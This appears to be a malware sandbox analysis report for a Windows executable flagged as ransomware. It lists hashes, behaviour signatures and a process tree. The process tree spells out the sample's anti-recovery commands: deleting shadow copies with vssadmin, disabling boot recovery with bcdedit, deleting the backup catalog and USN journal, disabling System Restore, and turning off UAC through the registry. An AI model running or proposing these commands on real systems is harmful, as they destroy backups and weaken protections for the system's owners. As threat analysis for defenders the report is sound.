Overview

overview

10

Static

static

10

b88fe97196...d0.exe

windows10-1703-x64

10

b88fe97196...d0.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    69s
  • max time network
    66s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2022 13:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

  • Size

    1.1MB

  • MD5

    ffc6b559c24b8d82afcb5c01bb5619d9

  • SHA1

    8e068e9c486769716d9685f85687b531ab3a88cf

  • SHA256

    b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

  • SHA512

    48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

  • SSDEEP

    24576:NyBzKGHF0bxTCFvXwKk/aISpu4Qc6F3v1HT2BzN2tgGS3YzYho1yWEsWbj28Q5m:AV4xTCzu4Qc6/F8S8bzQ

Score
9/10
evasionransomware

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
    "C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:4900
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
        2⤵
          PID:4596
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
          2⤵
            PID:4460
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              3⤵
              • Interacts with shadow copies
              PID:2880
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:540
            • C:\Windows\system32\vssadmin.exe
              vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
              3⤵
              • Interacts with shadow copies
              PID:484
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
            2⤵
              PID:664
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4972
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                3⤵
                • Interacts with shadow copies
                PID:2448
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4928
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:4008
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
              2⤵
                PID:4192
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                2⤵
                  PID:2796
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                  2⤵
                    PID:2356
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                    2⤵
                      PID:1980
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                      2⤵
                        PID:2828
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                        2⤵
                          PID:1812
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                          2⤵
                            PID:524
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                            2⤵
                              PID:2040
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                              2⤵
                                PID:4984
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                2⤵
                                  PID:4740

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads